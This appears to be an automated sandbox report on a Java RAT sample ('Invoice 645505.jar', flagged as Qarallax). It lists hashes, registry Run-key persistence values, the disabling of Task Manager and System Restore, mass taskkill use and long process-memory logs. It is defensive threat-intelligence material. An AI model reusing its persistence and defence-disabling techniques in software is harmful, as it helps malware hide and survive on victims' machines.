Analysis
max time kernel: 150s
max time network: 127s
platform: windows7_x64
resource: win7
submitted: 19-08-2020 10:25

Static task: static1

Behavioral task: behavioral1
Sample: Invoice 645505.jar
Resource: win7 (windows7_x64)
0 signatures
0 seconds

Behavioral task: behavioral2
Sample: Invoice 645505.jar
Resource: win10v200722 (windows10_x64)
0 signatures
0 seconds

General
Target: Invoice 645505.jar
Size: 411KB
MD5: c155328fa4fc5bcef15471d7b260ced4
SHA1: 3ed307dfdd397b93f6a6bb2fa69a8f10904d59cb
SHA256: 409a926c8b06ca68686a8061be80b306eb5c7b1b29aa4e7323540f555254caa8
SHA512: e9edce2b9e24578164876323f8678fbd62d5426fac48654a597b9776b97ab3a07232cfbfe3e25d988d9ec46fa7e38e425a3806d711174b5294c6124d5cdc88f7
Score: 10/10
Malware Config
Signatures

Qarallax RAT support DLL 1 IoCs
resource | yara_rule
behavioral1/files/0x000300000001352a-7.dat | qarallax_dll

Disables Task Manager via registry modification

Disables use of System Restore points 1 TTPs

Sets file execution options in registry 2 TTPs

Loads dropped DLL 1 IoCs
pid | Process
1088 | java.exe

Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\"" | java.exe
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\"" | java.exe

Drops desktop.ini file(s) 4 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\plstY\Desktop.ini | java.exe
File created | C:\Users\Admin\plstY\Desktop.ini | java.exe
File opened for modification | C:\Users\Admin\plstY\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\plstY\Desktop.ini | attrib.exe

Drops file in System32 directory 2 IoCs
description | ioc | Process
File created | C:\Windows\System32\zPcmE | java.exe
File opened for modification | C:\Windows\System32\zPcmE | java.exe

Kills process with taskkill 19 IoCs
pid | Process
2328 | taskkill.exe
672 | taskkill.exe
1580 | taskkill.exe
2176 | taskkill.exe
2280 | taskkill.exe
1876 | taskkill.exe
1060 | taskkill.exe
1500 | taskkill.exe
1532 | taskkill.exe
2224 | taskkill.exe
2424 | taskkill.exe
1380 | taskkill.exe
464 | taskkill.exe
464 | taskkill.exe
1580 | taskkill.exe
1756 | taskkill.exe
1568 | taskkill.exe
2376 | taskkill.exe
2472 | taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
1540 | powershell.exe
1540 | powershell.exe
Suspicious use of AdjustPrivilegeToken 100 IoCs
description | pid | Process
Token: SeIncreaseQuotaPrivilege | 744 | WMIC.exe
Token: SeSecurityPrivilege | 744 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 744 | WMIC.exe
Token: SeLoadDriverPrivilege | 744 | WMIC.exe
Token: SeSystemProfilePrivilege | 744 | WMIC.exe
Token: SeSystemtimePrivilege | 744 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 744 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 744 | WMIC.exe
Token: SeCreatePagefilePrivilege | 744 | WMIC.exe
Token: SeBackupPrivilege | 744 | WMIC.exe
Token: SeRestorePrivilege | 744 | WMIC.exe
Token: SeShutdownPrivilege | 744 | WMIC.exe
Token: SeDebugPrivilege | 744 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 744 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 744 | WMIC.exe
Token: SeUndockPrivilege | 744 | WMIC.exe
Token: SeManageVolumePrivilege | 744 | WMIC.exe
Token: 33 | 744 | WMIC.exe
Token: 34 | 744 | WMIC.exe
Token: 35 | 744 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 744 | WMIC.exe
Token: SeSecurityPrivilege | 744 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 744 | WMIC.exe
Token: SeLoadDriverPrivilege | 744 | WMIC.exe
Token: SeSystemProfilePrivilege | 744 | WMIC.exe
Token: SeSystemtimePrivilege | 744 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 744 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 744 | WMIC.exe
Token: SeCreatePagefilePrivilege | 744 | WMIC.exe
Token: SeBackupPrivilege | 744 | WMIC.exe
Token: SeRestorePrivilege | 744 | WMIC.exe
Token: SeShutdownPrivilege | 744 | WMIC.exe
Token: SeDebugPrivilege | 744 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 744 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 744 | WMIC.exe
Token: SeUndockPrivilege | 744 | WMIC.exe
Token: SeManageVolumePrivilege | 744 | WMIC.exe
Token: 33 | 744 | WMIC.exe
Token: 34 | 744 | WMIC.exe
Token: 35 | 744 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 284 | WMIC.exe
Token: SeSecurityPrivilege | 284 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 284 | WMIC.exe
Token: SeLoadDriverPrivilege | 284 | WMIC.exe
Token: SeSystemProfilePrivilege | 284 | WMIC.exe
Token: SeSystemtimePrivilege | 284 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 284 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 284 | WMIC.exe
Token: SeCreatePagefilePrivilege | 284 | WMIC.exe
Token: SeBackupPrivilege | 284 | WMIC.exe
Token: SeRestorePrivilege | 284 | WMIC.exe
Token: SeShutdownPrivilege | 284 | WMIC.exe
Token: SeDebugPrivilege | 284 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 284 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 284 | WMIC.exe
Token: SeUndockPrivilege | 284 | WMIC.exe
Token: SeManageVolumePrivilege | 284 | WMIC.exe
Token: 33 | 284 | WMIC.exe
Token: 34 | 284 | WMIC.exe
Token: 35 | 284 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 284 | WMIC.exe
Token: SeSecurityPrivilege | 284 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 284 | WMIC.exe
Token: SeLoadDriverPrivilege | 284 | WMIC.exe
Token: SeSystemProfilePrivilege | 284 | WMIC.exe
Token: SeSystemtimePrivilege | 284 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 284 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 284 | WMIC.exe
Token: SeCreatePagefilePrivilege | 284 | WMIC.exe
Token: SeBackupPrivilege | 284 | WMIC.exe
Token: SeRestorePrivilege | 284 | WMIC.exe
Token: SeShutdownPrivilege | 284 | WMIC.exe
Token: SeDebugPrivilege | 284 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 284 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 284 | WMIC.exe
Token: SeUndockPrivilege | 284 | WMIC.exe
Token: SeManageVolumePrivilege | 284 | WMIC.exe
Token: 33 | 284 | WMIC.exe
Token: 34 | 284 | WMIC.exe
Token: 35 | 284 | WMIC.exe
Token: SeDebugPrivilege | 1876 | taskkill.exe
Token: SeDebugPrivilege | 1380 | taskkill.exe
Token: SeDebugPrivilege | 1756 | taskkill.exe
Token: SeDebugPrivilege | 1568 | taskkill.exe
Token: SeDebugPrivilege | 1540 | powershell.exe
Token: SeDebugPrivilege | 464 | taskkill.exe
Token: SeDebugPrivilege | 672 | taskkill.exe
Token: SeDebugPrivilege | 464 | taskkill.exe
Token: SeDebugPrivilege | 1580 | taskkill.exe
Token: SeDebugPrivilege | 1580 | taskkill.exe
Token: SeDebugPrivilege | 1060 | taskkill.exe
Token: SeDebugPrivilege | 1532 | taskkill.exe
Token: SeDebugPrivilege | 1500 | taskkill.exe
Token: SeDebugPrivilege | 2176 | taskkill.exe
Token: SeDebugPrivilege | 2224 | taskkill.exe
Token: SeDebugPrivilege | 2280 | taskkill.exe
Token: SeDebugPrivilege | 2328 | taskkill.exe
Token: SeDebugPrivilege | 2376 | taskkill.exe
Token: SeDebugPrivilege | 2424 | taskkill.exe
Token: SeDebugPrivilege | 2472 | taskkill.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
1088 | java.exe
Suspicious use of WriteProcessMemory 798 IoCs
description | pid | Process | procid_target
PID 1088 wrote to memory of 304 | 1088 | java.exe | 25
PID 1088 wrote to memory of 304 | 1088 | java.exe | 25
PID 1088 wrote to memory of 304 | 1088 | java.exe | 25
PID 1088 wrote to memory of 792 | 1088 | java.exe | 26
PID 1088 wrote to memory of 792 | 1088 | java.exe | 26
PID 1088 wrote to memory of 792 | 1088 | java.exe | 26
PID 792 wrote to memory of 744 | 792 | cmd.exe | 27
PID 792 wrote to memory of 744 | 792 | cmd.exe | 27
PID 792 wrote to memory of 744 | 792 | cmd.exe | 27
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 28
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 28
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 28
PID 1040 wrote to memory of 284 | 1040 | cmd.exe | 29
PID 1040 wrote to memory of 284 | 1040 | cmd.exe | 29
PID 1040 wrote to memory of 284 | 1040 | cmd.exe | 29
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 30
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 30
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 30
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 31
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 31
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 31
PID 1088 wrote to memory of 1832 | 1088 | java.exe | 32
PID 1088 wrote to memory of 1832 | 1088 | java.exe | 32
PID 1088 wrote to memory of 1832 | 1088 | java.exe | 32
PID 1088 wrote to memory of 1828 | 1088 | java.exe | 33
PID 1088 wrote to memory of 1828 | 1088 | java.exe | 33
PID 1088 wrote to memory of 1828 | 1088 | java.exe | 33
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 34
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 34
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 34
PID 1088 wrote to memory of 1840 | 1088 | java.exe | 35
PID 1088 wrote to memory of 1840 | 1088 | java.exe | 35
PID 1088 wrote to memory of 1840 | 1088 | java.exe | 35
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 36
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 36
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 36
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 37
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 37
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 37
PID 1088 wrote to memory of 1628 | 1088 | java.exe | 38
PID 1088 wrote to memory of 1628 | 1088 | java.exe | 38
PID 1088 wrote to memory of 1628 | 1088 | java.exe | 38
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 39
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 39
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 39
PID 1088 wrote to memory of 1540 | 1088 | java.exe | 40
PID 1088 wrote to memory of 1540 | 1088 | java.exe | 40
PID 1088 wrote to memory of 1540 | 1088 | java.exe | 40
PID 1088 wrote to memory of 1604 | 1088 | java.exe | 41
PID 1088 wrote to memory of 1604 | 1088 | java.exe | 41
PID 1088 wrote to memory of 1604 | 1088 | java.exe | 41
PID 1088 wrote to memory of 1876 | 1088 | java.exe | 42
PID 1088 wrote to memory of 1876 | 1088 | java.exe | 42
PID 1088 wrote to memory of 1876 | 1088 | java.exe | 42
PID 1628 wrote to memory of 1868 | 1628 | cmd.exe | 44
PID 1628 wrote to memory of 1868 | 1628 | cmd.exe | 44
PID 1628 wrote to memory of 1868 | 1628 | cmd.exe | 44
PID 1088 wrote to memory of 1960 | 1088 | java.exe | 46
PID 1088 wrote to memory of 1960 | 1088 | java.exe | 46
PID 1088 wrote to memory of 1960 | 1088 | java.exe | 46
PID 1088 wrote to memory of 1940 | 1088 | java.exe | 49
PID 1088 wrote to memory of 1940 | 1088 | java.exe | 49
PID 1088 wrote to memory of 1940 | 1088 | java.exe | 49
PID 1088 wrote to memory of 2032 | 1088 | java.exe | 51
PID 1088 wrote to memory of 2032 | 1088 | java.exe | 51
PID 1088 wrote to memory of 2032 | 1088 | java.exe | 51
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 52
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 52
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 52
PID 1628 wrote to memory of 1476 | 1628 | cmd.exe | 54
PID 1628 wrote to memory of 1476 | 1628 | cmd.exe | 54
PID 1628 wrote to memory of 1476 | 1628 | cmd.exe | 54
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 55
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 55
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 55
PID 1088 wrote to memory of 1012 | 1088 | java.exe | 56
PID 1088 wrote to memory of 1012 | 1088 | java.exe | 56
PID 1088 wrote to memory of 1012 | 1088 | java.exe | 56
PID 1088 wrote to memory of 1504 | 1088 | java.exe | 60
PID 1088 wrote to memory of 1504 | 1088 | java.exe | 60
PID 1088 wrote to memory of 1504 | 1088 | java.exe | 60
PID 1088 wrote to memory of 1632 | 1088 | java.exe | 61
PID 1088 wrote to memory of 1632 | 1088 | java.exe | 61
PID 1088 wrote to memory of 1632 | 1088 | java.exe | 61
PID 1088 wrote to memory of 744 | 1088 | java.exe | 62
PID 1088 wrote to memory of 744 | 1088 | java.exe | 62
PID 1088 wrote to memory of 744 | 1088 | java.exe | 62
PID 1088 wrote to memory of 1332 | 1088 | java.exe | 66
PID 1088 wrote to memory of 1332 | 1088 | java.exe | 66
PID 1088 wrote to memory of 1332 | 1088 | java.exe | 66
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 67
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 67
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 67
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 70
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 70
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 70
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 72
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 72
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 72
PID 1088 wrote to memory of 1904 | 1088 | java.exe | 74
PID 1088 wrote to memory of 1904 | 1088 | java.exe | 74
PID 1088 wrote to memory of 1904 | 1088 | java.exe | 74
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 75
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 75
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 75
PID 1088 wrote to memory of 2040 | 1088 | java.exe | 77
PID 1088 wrote to memory of 2040 | 1088 | java.exe | 77
PID 1088 wrote to memory of 2040 | 1088 | java.exe | 77
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 78
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 78
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 78
PID 1088 wrote to memory of 324 | 1088 | java.exe | 82
PID 1088 wrote to memory of 324 | 1088 | java.exe | 82
PID 1088 wrote to memory of 324 | 1088 | java.exe | 82
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 83
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 83
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 83
PID 1904 wrote to memory of 1784 | 1904 | cmd.exe | 84
PID 1904 wrote to memory of 1784 | 1904 | cmd.exe | 84
PID 1904 wrote to memory of 1784 | 1904 | cmd.exe | 84
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 87
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 87
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 87
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 88
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 88
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 88
PID 1088 wrote to memory of 1620 | 1088 | java.exe | 90
PID 1088 wrote to memory of 1620 | 1088 | java.exe | 90
PID 1088 wrote to memory of 1620 | 1088 | java.exe | 90
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 91
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 91
PID 1088 wrote to memory of 1788 | 1088 | java.exe | 91
PID 1904 wrote to memory of 1932 | 1904 | cmd.exe | 93
PID 1904 wrote to memory of 1932 | 1904 | cmd.exe | 93
PID 1904 wrote to memory of 1932 | 1904 | cmd.exe | 93
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 95
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 95
PID 1088 wrote to memory of 1040 | 1088 | java.exe | 95
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 97
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 97
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 97
PID 1088 wrote to memory of 464 | 1088 | java.exe | 98
PID 1088 wrote to memory of 464 | 1088 | java.exe | 98
PID 1088 wrote to memory of 464 | 1088 | java.exe | 98
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 100
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 100
PID 1088 wrote to memory of 1992 | 1088 | java.exe | 100
PID 1040 wrote to memory of 1484 | 1040 | cmd.exe | 102
PID 1040 wrote to memory of 1484 | 1040 | cmd.exe | 102
PID 1040 wrote to memory of 1484 | 1040 | cmd.exe | 102
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 103
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 103
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 103
PID 1088 wrote to memory of 1516 | 1088 | java.exe | 106
PID 1088 wrote to memory of 1516 | 1088 | java.exe | 106
PID 1088 wrote to memory of 1516 | 1088 | java.exe | 106
PID 1088 wrote to memory of 744 | 1088 | java.exe | 107
PID 1088 wrote to memory of 744 | 1088 | java.exe | 107
PID 1088 wrote to memory of 744 | 1088 | java.exe | 107
PID 1088 wrote to memory of 1756 | 1088 | java.exe | 109
PID 1088 wrote to memory of 1756 | 1088 | java.exe | 109
PID 1088 wrote to memory of 1756 | 1088 | java.exe | 109
PID 1040 wrote to memory of 1560 | 1040 | cmd.exe | 110
PID 1040 wrote to memory of 1560 | 1040 | cmd.exe | 110
PID 1040 wrote to memory of 1560 | 1040 | cmd.exe | 110
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 111
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 111
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 111
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 115
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 115
PID 1088 wrote to memory of 1180 | 1088 | java.exe | 115
PID 1088 wrote to memory of 1476 | 1088 | java.exe | 116
PID 1088 wrote to memory of 1476 | 1088 | java.exe | 116
PID 1088 wrote to memory of 1476 | 1088 | java.exe | 116
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 118
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 118
PID 1088 wrote to memory of 1920 | 1088 | java.exe | 118
PID 1476 wrote to memory of 1104 | 1476 | cmd.exe | 119
PID 1476 wrote to memory of 1104 | 1476 | cmd.exe | 119
PID 1476 wrote to memory of 1104 | 1476 | cmd.exe | 119
PID 1476 wrote to memory of 2040 | 1476 | cmd.exe | 120
PID 1476 wrote to memory of 2040 | 1476 | cmd.exe | 120
PID 1476 wrote to memory of 2040 | 1476 | cmd.exe | 120
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 123
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 123
PID 1088 wrote to memory of 1900 | 1088 | java.exe | 123
PID 1900 wrote to memory of 652 | 1900 | cmd.exe | 124
PID 1900 wrote to memory of 652 | 1900 | cmd.exe | 124
PID 1900 wrote to memory of 652 | 1900 | cmd.exe | 124
PID 1900 wrote to memory of 572 | 1900 | cmd.exe | 125
PID 1900 wrote to memory of 572 | 1900 | cmd.exe | 125
PID 1900 wrote to memory of 572 | 1900 | cmd.exe | 125
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 126
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 126
PID 1088 wrote to memory of 1776 | 1088 | java.exe | 126
PID 1776 wrote to memory of 1948 | 1776 | cmd.exe | 127
PID 1776 wrote to memory of 1948 | 1776 | cmd.exe | 127
PID 1776 wrote to memory of 1948 | 1776 | cmd.exe | 127
PID 1776 wrote to memory of 1608 | 1776 | cmd.exe | 128
PID 1776 wrote to memory of 1608 | 1776 | cmd.exe | 128
PID 1776 wrote to memory of 1608 | 1776 | cmd.exe | 128
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 129
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 129
PID 1088 wrote to memory of 1824 | 1088 | java.exe | 129
PID 1824 wrote to memory of 296 | 1824 | cmd.exe | 130
PID 1824 wrote to memory of 296 | 1824 | cmd.exe | 130
PID 1824 wrote to memory of 296 | 1824 | cmd.exe | 130
PID 1824 wrote to memory of 1076 | 1824 | cmd.exe | 131
PID 1824 wrote to memory of 1076 | 1824 | cmd.exe | 131
PID 1824 wrote to memory of 1076 | 1824 | cmd.exe | 131
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 132
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 132
PID 1088 wrote to memory of 1752 | 1088 | java.exe | 132
PID 1752 wrote to memory of 1940 | 1752 | cmd.exe | 133
PID 1752 wrote to memory of 1940 | 1752 | cmd.exe | 133
PID 1752 wrote to memory of 1940 | 1752 | cmd.exe | 133
PID 1088 wrote to memory of 1568 | 1088 | java.exe | 134
PID 1088 wrote to memory of 1568 | 1088 | java.exe | 134
PID 1088 wrote to memory of 1568 | 1088 | java.exe | 134
PID 1752 wrote to memory of 1976 | 1752 | cmd.exe | 136
PID 1752 wrote to memory of 1976 | 1752 | cmd.exe | 136
PID 1752 wrote to memory of 1976 | 1752 | cmd.exe | 136
PID 1088 wrote to memory of 1576 | 1088 | java.exe | 137
PID 1088 wrote to memory of 1576 | 1088 | java.exe | 137
PID 1088 wrote to memory of 1576 | 1088 | java.exe | 137
PID 1576 wrote to memory of 1772 | 1576 | cmd.exe | 138
PID 1576 wrote to memory of 1772 | 1576 | cmd.exe | 138
PID 1576 wrote to memory of 1772 | 1576 | cmd.exe | 138
PID 1576 wrote to memory of 1484 | 1576 | cmd.exe | 139
PID 1576 wrote to memory of 1484 | 1576 | cmd.exe | 139
PID 1576 wrote to memory of 1484 | 1576 | cmd.exe | 139
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 140
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 140
PID 1088 wrote to memory of 1560 | 1088 | java.exe | 140
PID 1560 wrote to memory of 1796 | 1560 | cmd.exe | 141
PID 1560 wrote to memory of 1796 | 1560 | cmd.exe | 141
PID 1560 wrote to memory of 1796 | 1560 | cmd.exe | 141
PID 1560 wrote to memory of 1856 | 1560 | cmd.exe | 142
PID 1560 wrote to memory of 1856 | 1560 | cmd.exe | 142
PID 1560 wrote to memory of 1856 | 1560 | cmd.exe | 142
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 143
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 143
PID 1088 wrote to memory of 1496 | 1088 | java.exe | 143
PID 1496 wrote to memory of 1176 | 1496 | cmd.exe | 144
PID 1496 wrote to memory of 1176 | 1496 | cmd.exe | 144
PID 1496 wrote to memory of 1176 | 1496 | cmd.exe | 144
PID 1496 wrote to memory of 1180 | 1496 | cmd.exe | 145
PID 1496 wrote to memory of 1180 | 1496 | cmd.exe | 145
PID 1496 wrote to memory of 1180 | 1496 | cmd.exe | 145
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 146
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 146
PID 1088 wrote to memory of 1548 | 1088 | java.exe | 146
PID 1548 wrote to memory of 1920 | 1548 | cmd.exe | 147
PID 1548 wrote to memory of 1920 | 1548 | cmd.exe | 147
PID 1548 wrote to memory of 1920 | 1548 | cmd.exe | 147
PID 1548 wrote to memory of 1780 | 1548 | cmd.exe | 148
PID 1548 wrote to memory of 1780 | 1548 | cmd.exe | 148
PID 1548 wrote to memory of 1780 | 1548 | cmd.exe | 148
PID 1088 wrote to memory of 652 | 1088 | java.exe | 149
PID 1088 wrote to memory of 652 | 1088 | java.exe | 149
PID 1088 wrote to memory of 652 | 1088 | java.exe | 149
PID 652 wrote to memory of 1340 | 652 | cmd.exe | 150
PID 652 wrote to memory of 1340 | 652 | cmd.exe | 150
PID 652 wrote to memory of 1340 | 652 | cmd.exe | 150
PID 652 wrote to memory of 1912 | 652 | cmd.exe | 151
PID 652 wrote to memory of 1912 | 652 | cmd.exe | 151
PID 652 wrote to memory of 1912 | 652 | cmd.exe | 151
PID 1088 wrote to memory of 296 | 1088 | java.exe | 152
PID 1088 wrote to memory of 296 | 1088 | java.exe | 152
PID 1088 wrote to memory of 296 | 1088 | java.exe | 152
PID 1088 wrote to memory of 464 | 1088 | java.exe | 153
PID 1088 wrote to memory of 464 | 1088 | java.exe | 153
PID 1088 wrote to memory of 464 | 1088 | java.exe | 153
PID 296 wrote to memory of 1924 | 296 | cmd.exe | 155
PID 296 wrote to memory of 1924 | 296 | cmd.exe | 155
PID 296 wrote to memory of 1924 | 296 | cmd.exe | 155
PID 296 wrote to memory of 1692 | 296 | cmd.exe | 156
PID 296 wrote to memory of 1692 | 296 | cmd.exe | 156
PID 296 wrote to memory of 1692 | 296 | cmd.exe | 156
PID 1088 wrote to memory of 1684 | 1088 | java.exe | 157
PID 1088 wrote to memory of 1684 | 1088 | java.exe | 157
PID 1088 wrote to memory of 1684 | 1088 | java.exe | 157
PID 1684 wrote to memory of 1332 | 1684 | cmd.exe | 158
PID 1684 wrote to memory of 1332 | 1684 | cmd.exe | 158
PID 1684 wrote to memory of 1332 | 1684 | cmd.exe | 158
PID 1684 wrote to memory of 2016 | 1684 | cmd.exe | 159
PID 1684 wrote to memory of 2016 | 1684 | cmd.exe | 159
PID 1684 wrote to memory of 2016 | 1684 | cmd.exe | 159
PID 1088 wrote to memory of 2044 | 1088 | java.exe | 160
PID 1088 wrote to memory of 2044 | 1088 | java.exe | 160
PID 1088 wrote to memory of 2044 | 1088 | java.exe | 160
PID 2044 wrote to memory of 1756 | 2044 | cmd.exe | 161
PID 2044 wrote to memory of 1756 | 2044 | cmd.exe | 161
PID 2044 wrote to memory of 1756 | 2044 | cmd.exe | 161
PID 2044 wrote to memory of 456 | 2044 | cmd.exe | 162
PID 2044 wrote to memory of 456 | 2044 | cmd.exe | 162
PID 2044 wrote to memory of 456 | 2044 | cmd.exe | 162
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 163
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 163
PID 1088 wrote to memory of 1380 | 1088 | java.exe | 163
PID 1380 wrote to memory of 1012 | 1380 | cmd.exe | 164
PID 1380 wrote to memory of 1012 | 1380 | cmd.exe | 164
PID 1380 wrote to memory of 1012 | 1380 | cmd.exe | 164
PID 1380 wrote to memory of 1860 | 1380 | cmd.exe | 165
PID 1380 wrote to memory of 1860 | 1380 | cmd.exe | 165
PID 1380 wrote to memory of 1860 | 1380 | cmd.exe | 165
PID 1088 wrote to memory of 1864 | 1088 | java.exe | 166
PID 1088 wrote to memory of 1864 | 1088 | java.exe | 166
PID 1088 wrote to memory of 1864 | 1088 | java.exe | 166
PID 1864 wrote to memory of 1944 | 1864 | cmd.exe | 167
PID 1864 wrote to memory of 1944 | 1864 | cmd.exe | 167
PID 1864 wrote to memory of 1944 | 1864 | cmd.exe | 167
PID 1864 wrote to memory of 1856 | 1864 | cmd.exe | 168
PID 1864 wrote to memory of 1856 | 1864 | cmd.exe | 168
PID 1864 wrote to memory of 1856 | 1864 | cmd.exe | 168
PID 1088 wrote to memory of 672 | 1088 | java.exe | 169
PID 1088 wrote to memory of 672 | 1088 | java.exe | 169
PID 1088 wrote to memory of 672 | 1088 | java.exe | 169
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 171
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 171
PID 1088 wrote to memory of 1624 | 1088 | java.exe | 171
PID 1624 wrote to memory of 1928 | 1624 | cmd.exe | 172
PID 1624 wrote to memory of 1928 | 1624 | cmd.exe | 172
PID 1624 wrote to memory of 1928 | 1624 | cmd.exe | 172
PID 1624 wrote to memory of 1552 | 1624 | cmd.exe | 173
PID 1624 wrote to memory of 1552 | 1624 | cmd.exe | 173
PID 1624 wrote to memory of 1552 | 1624 | cmd.exe | 173
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 174
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 174
PID 1088 wrote to memory of 1780 | 1088 | java.exe | 174
PID 1780 wrote to memory of 1036 | 1780 | cmd.exe | 175
PID 1780 wrote to memory of 1036 | 1780 | cmd.exe | 175
PID 1780 wrote to memory of 1036 | 1780 | cmd.exe | 175
PID 1780 wrote to memory of 1340 | 1780 | cmd.exe | 176
PID 1780 wrote to memory of 1340 | 1780 | cmd.exe | 176
